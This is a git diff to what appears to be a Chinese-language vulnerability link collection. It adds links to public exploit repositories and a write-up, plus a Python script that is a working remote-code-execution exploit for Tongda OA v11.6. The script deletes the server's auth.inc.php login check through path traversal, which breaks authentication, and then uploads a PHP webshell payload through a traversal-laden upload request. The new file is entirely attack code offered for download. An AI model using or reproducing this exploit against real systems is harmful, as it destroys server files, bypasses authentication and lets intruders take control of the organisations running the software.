diff --git a/README.md b/README.md index dfe2050..7ed06b7 100644 --- a/README.md +++ b/README.md @@ -146,8 +146,8 @@ - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947) - [CVE-2020-0554:phpMyAdmin后台SQL注入](./CVE-2020-0554:phpMyAdmin后台SQL注入.md) - [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf) -- [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce) -- [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行]() +- [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)|[通达OAv11.6版本RCE复现分析+EXP](./books/通达OAv11.6版本漏洞复现分析.pdf)-[EXP下载](./tools/通达OA_v11.6_RCE_EXP.py) +- [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行](https://github.com/0nise/vuldebug) - [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面(Sonatype Nexus <3.21.1)](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204) - [CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/) - [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260) diff --git a/books/通达OAv11.6版本漏洞复现分析.pdf b/books/通达OAv11.6版本漏洞复现分析.pdf new file mode 100644 index 0000000..b24c0df Binary files /dev/null and b/books/通达OAv11.6版本漏洞复现分析.pdf differ diff --git a/tools/通达OA_v11.6_RCE_EXP.py b/tools/通达OA_v11.6_RCE_EXP.py new file mode 100644 index 0000000..6962c83 --- /dev/null +++ b/tools/通达OA_v11.6_RCE_EXP.py @@ -0,0 +1,32 @@ +import requests + +# 通达OA v11.6 RCE EXP +# 注意,会删除 auth.inc.php 文件,这个文件是判断用户是否登陆的文件,如果没有登陆就不能上传,所以把这个文件删掉就可以成功上传webshell了。 +target = "http://127.0.0.1:1234/" +payload = "" +print( + "[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA" +) +input("Press enter to continue") +print("[*]Deleting auth.inc.php....") +url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" +requests.get(url=url) +print("[*]Checking if file deleted...") +url = target + "/inc/auth.inc.php" +page = requests.get(url=url).text +if 'No input file specified.' not in page: + print("[-]Failed to deleted auth.inc.php") + exit(-1) +print("[+]Successfully deleted auth.inc.php!") +print("[*]Uploading payload...") +url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" +files = {'FILE1': ('deconf.php', payload)} +requests.post(url=url, files=files) +url = target + "/_deconf.php" +page = requests.get(url=url).text + +if 'No input file specified.' not in page: + print("[+]Filed Uploaded Successfully") + print("[+]URL:", url) +else: + print("[-]Failed to upload file")